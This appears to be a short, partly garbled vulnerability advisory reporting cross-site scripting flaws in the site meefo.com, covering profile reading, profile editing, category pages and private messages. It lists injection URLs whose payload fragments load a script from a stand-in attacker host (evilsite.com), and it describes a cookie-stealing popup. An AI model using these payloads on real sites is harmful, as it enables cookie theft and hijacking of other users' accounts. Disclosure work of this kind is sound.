|
Meefo.com=0D
=0D
Homepage:=0D
http://meefo.com=0D
=0D
Effected files:=0D
reading profiles=0D
index.php=0D
input boxes onprofiles=0D
sending private msgs=0D
=0D
------------------------------=0D
=0D
Reading aprofile and with cookie include PoC:=0D
Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as =0D
=0D
and itwill popup with the users cookie. Incldued at the end of this article are =0D
=0D
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.=0D
=0D
http://meefo.com/?do=rdprof&user_pp=username=0D
=0D
When editing your profile, data isn't properally filtered in theinput boxes either, so =0D">SRC=http://evilsite.com/xss.js>=0D
=0D
Reading catagories XSS Vuln:=0D
http://meefo.com/index.php?cat=Poetry=0D">SRC=http://evilsite.com/xss.js>=0D
=0D
Sending PM's XSS Vuln:=0D
http://meefo.com/?messages=send&to==0D">SRC=http://evilsite.com/xss.js>=0D
=0D
=0D
Screenshots of cookie include vulns & more:=0D
=0D
http://www.youfucktard.com/xsp/meefo1.jpg=0D
http://www.youfucktard.com/xsp/meefo2.jpg=0D
http://www.youfucktard.com/xsp/meefo3.jpg=0D
http://www.youfucktard.com/xsp/meefo4.jpg=0D
http://www.youfucktard.com/xsp/meefo5.jpg=0D
http://www.youfucktard.com/xsp/meefo6.jpg